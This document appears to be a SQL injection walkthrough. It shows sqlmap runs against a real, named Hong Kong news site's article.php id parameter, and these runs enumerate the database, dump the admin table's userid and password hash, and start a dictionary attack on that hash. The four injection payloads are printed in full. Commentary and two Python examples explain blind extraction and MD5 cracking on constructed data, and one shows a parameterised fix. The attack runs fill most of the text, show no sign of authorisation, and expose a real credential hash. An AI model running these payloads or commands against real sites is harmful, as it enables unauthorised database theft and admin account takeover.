D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-user    /* note: fetch the name of the current database user

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:53:54

[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:53:54] [INFO] resuming injection data from session file
[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:53:54] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:53:55] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:53:55] [INFO] fetching current user
current user:    'root@localhost'
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:53:58

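A few things in that first run are worth reading closely. The "0 HTTP(s) requests" line only means the four injection points were resumed from the session file of an earlier run, not that detection is free; the CHAR(58,99,118,120,58) and CHAR(58,110,99,118,58) sequences in the error-based and UNION payloads are just sqlmap's ':cvx:' and ':ncv:' delimiter strings, used to find the extracted value in the response; and the application technology line (Apache 2.2.11, PHP 5.3.0 on Windows) says the id parameter is being pasted straight into a MySQL query. The following is an added example, not code from the original post or from sqlmap: it shows what the "boolean-based blind" injection point is actually doing when sqlmap fetches the current user, by simulating article.php with an in-memory SQLite database standing in for MySQL. The article table, its rows and the 'root@localhost' value are constructed, and ASCII(), SUBSTRING() and USER() are registered as SQLite functions so the payloads read like the MySQL ones sqlmap sends. A parameterised version of the same lookup is included to show why the payload stops working once the id is bound instead of concatenated.

```python
"""Boolean-based blind extraction, the way sqlmap does it for --current-user.

Added example for this writeup; the target is simulated with SQLite and the
data below is constructed.  MySQL built-ins used by the payloads (ASCII,
SUBSTRING, USER) are emulated as user-defined SQLite functions.
"""
import sqlite3

INJECT_ID = "276"                 # the real article id from the original URL
CURRENT_USER = "root@localhost"   # constructed; matches what sqlmap recovered


def make_target():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE article (id INTEGER, title TEXT)")
    conn.executemany("INSERT INTO article VALUES (?, ?)",
                     [(275, "previous"), (276, "constructed editorial"), (277, "next")])
    # MySQL functions the payloads rely on, emulated for SQLite
    conn.create_function("USER", 0, lambda: CURRENT_USER)
    conn.create_function("ASCII", 1, lambda s: ord(s[0]) if s else 0)   # ASCII('') = 0 as in MySQL
    conn.create_function("SUBSTRING", 3, lambda s, pos, n: s[pos - 1:pos - 1 + n])
    return conn


class VulnerableArticlePage:
    """Models article.php: the id parameter is concatenated straight into SQL."""

    def __init__(self, conn):
        self.conn = conn
        self.requests = 0

    def get(self, id_param):
        """Return True when an article renders (the boolean oracle sqlmap reads)."""
        self.requests += 1
        sql = "SELECT title FROM article WHERE id=" + id_param   # the injection point
        return self.conn.execute(sql).fetchone() is not None


def confirm_boolean_blind(page):
    """sqlmap's check: a true predicate (799=799) and a false one must render differently."""
    return page.get(f"{INJECT_ID} AND 799=799") and not page.get(f"{INJECT_ID} AND 799=798")


def blind_extract(page, expression, max_len=64):
    """Recover a string expression one character at a time.

    Each character is found by binary search on ASCII(SUBSTRING(expr,i,1)) > mid
    over 0..127, so it costs exactly 7 requests; ASCII('') = 0 marks the end.
    """
    out = ""
    for pos in range(1, max_len + 1):
        low, high = 0, 127
        while low < high:
            mid = (low + high) // 2
            if page.get(f"{INJECT_ID} AND ASCII(SUBSTRING({expression},{pos},1))>{mid}"):
                low = mid + 1
            else:
                high = mid
        if low == 0:
            break
        out += chr(low)
    return out


def safe_get(conn, id_param):
    """The fix: validate the type and bind the value, so the payload is never parsed as SQL."""
    try:
        article_id = int(id_param)
    except ValueError:
        return False
    return conn.execute("SELECT title FROM article WHERE id=?", (article_id,)).fetchone() is not None


def demo():
    """Run the detection check and the extraction; return (user, requests spent)."""
    page = VulnerableArticlePage(make_target())
    if not confirm_boolean_blind(page):
        raise RuntimeError("parameter is not boolean-blind injectable")
    user = blind_extract(page, "USER()")
    return user, page.requests


if __name__ == "__main__":
    recovered, spent = demo()
    print(f"current user: {recovered!r} recovered in {spent} requests")
    print("same payload against the parameterised query:",
          safe_get(make_target(), f"{INJECT_ID} AND 799=799"))
```

Fourteen characters plus the terminator at 7 requests each, plus the two detection probes, is 107 requests for one short string; that is why sqlmap prefers the UNION and error-based points when it has them and falls back to boolean and time-based blind only when it must.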
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --current-db    /* current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:54:16

[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:54:16] [INFO] resuming injection data from session file
[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:54:16] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:54:17] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:54:17] [INFO] fetching current database
current database:    'wepost'
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:54:18

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --tables -D "wepost"    /* fetch the table names in the current database

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:55:25

[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as session file
[16:55:25] [INFO] resuming injection data from session file
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[16:55:25] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
[16:55:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:55:26] [INFO] fetching tables for database 'wepost'
[16:55:27] [INFO] the SQL query used returns 6 entries
Database: wepost
[6 tables]
+-------------+
| admin       |
| article     |
| contributor |
| idea        |
| image       |
| issue       |
+-------------+

[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\output\www.wepost.com.hk'

shutting down at: 16:55:33

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --columns -T "admin" -D "wepost" -v 0    /* fetch the column names of the admin table

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:56:06

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\session': wepost, wepost
Database: wepost
Table: admin
[4 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(11)     |
| password | varchar(32) |
| type     | varchar(10) |
| userid   | varchar(20) |
+----------+-------------+

shutting down at: 16:56:19

D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --dbms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0    /* fetch the contents of those columns

    sqlmap/0.9 - automatic SQL injection and database takeover tool
    http://sqlmap.sourceforge.net

starting at: 16:57:14

sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=276 AND 799=799

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)

    Type: UNION query
    Title: MySQL UNION query (NULL) - 1 to 10 columns
    Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: id=276 AND SLEEP(5)
---
web server operating system: Windows
web application technology: Apache 2.2.11, PHP 5.3.0
back-end DBMS: MySQL 5.0
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
what's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
do you want to use common password suffixes? (slow!) [y/N] y
Database: wepost
Table: admin
[1 entry]
+----------------------------------+------------+
| password                         | userid     |
+----------------------------------+------------+
| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
+----------------------------------+------------+

shutting down at: 16:58:14

D:\Python27\sqlmap>
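The last run ends with sqlmap's hash handling: the password column is varchar(32) and the dumped value is 32 hex characters, so sqlmap flags it as a possible hash (unsalted MD5 is the usual guess for that shape, though NTLM and MD4 look the same) and offers to run txt/wordlist.txt against it, optionally with common suffixes appended to each word. When that succeeds sqlmap prints the plaintext in parentheses after the hash in the dump table; nothing follows 7d4d7589db8b28e04db0982dd0e92189 here, so the default wordlist did not crack it. The block below is an added example, not code from the original post or from sqlmap, showing the same three steps on constructed data: recognise the hash shape, try word plus suffix combinations, and annotate the dumped row the way sqlmap does. The wordlist and suffix list are stand-ins I made up (sqlmap's own are longer), the admin rows are constructed, and the hash from the real dump is not attacked here.

```python
"""Hash recognition and dictionary attack with common suffixes, as sqlmap
offers after a --dump.  Added example on constructed data; the wordlist and
suffix list are assumptions, not sqlmap's actual files.
"""
import hashlib
import re

# 32 hex characters: the shape of the value dumped from admin.password.
# Unsalted MD5 is the usual hypothesis for a varchar(32) web-app column,
# but NTLM and MD4 digests have the same shape, so verify before relying on it.
HEX32_RE = re.compile(r"^[0-9a-fA-F]{32}$")

# Constructed stand-in for sqlmap's txt/wordlist.txt.
WORDLIST = ["password", "admin", "wepost", "letmein", "editor"]

# Constructed suffixes; "" first so each bare word is tried before its variants.
COMMON_SUFFIXES = ["", "1", "123", "2010", "!", "01"]


def md5_hex(text):
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def looks_like_md5(value):
    """True when a dumped cell has the 32-hex shape sqlmap treats as a hash candidate."""
    return bool(HEX32_RE.match(value))


def crack_md5(target_hash, words=WORDLIST, suffixes=COMMON_SUFFIXES):
    """Try every word+suffix; return (plaintext, candidates_tried) or (None, candidates_tried)."""
    target = target_hash.lower()
    tried = 0
    for word in words:
        for suffix in suffixes:
            tried += 1
            candidate = word + suffix
            if md5_hex(candidate) == target:
                return candidate, tried
    return None, tried


def annotate_dump(rows, words=WORDLIST, suffixes=COMMON_SUFFIXES):
    """Mimic sqlmap's dump table: a cracked hash is followed by '(plaintext)', others are left as-is."""
    annotated = []
    for userid, password in rows:
        if looks_like_md5(password):
            plain, _ = crack_md5(password, words, suffixes)
            if plain is not None:
                password = f"{password} ({plain})"
        annotated.append((userid, password))
    return annotated


# Constructed admin rows: a hash that the lists above will hit (word "wepost"
# with suffix "2010"), a hash of a value not in the lists, and a non-hash cell.
DEMO_ROWS = [
    ("demo_editor", md5_hex("wepost2010")),
    ("demo_other", md5_hex("correct horse battery staple")),
    ("demo_plain", "not-a-hash"),
]

if __name__ == "__main__":
    print("+" + "-" * 52 + "+" + "-" * 14 + "+")
    for userid, password in annotate_dump(DEMO_ROWS):
        print(f"| {password:<50} | {userid:<12} |")
    print("+" + "-" * 52 + "+" + "-" * 14 + "+")
```

The suffix loop is what makes sqlmap warn "(slow!)": each suffix multiplies the number of digests by the wordlist size, and for a single unsalted MD5 that is still cheap, which is exactly why storing admin passwords as plain MD5, as this application does, gives an attacker who has already dumped the table very little left to do.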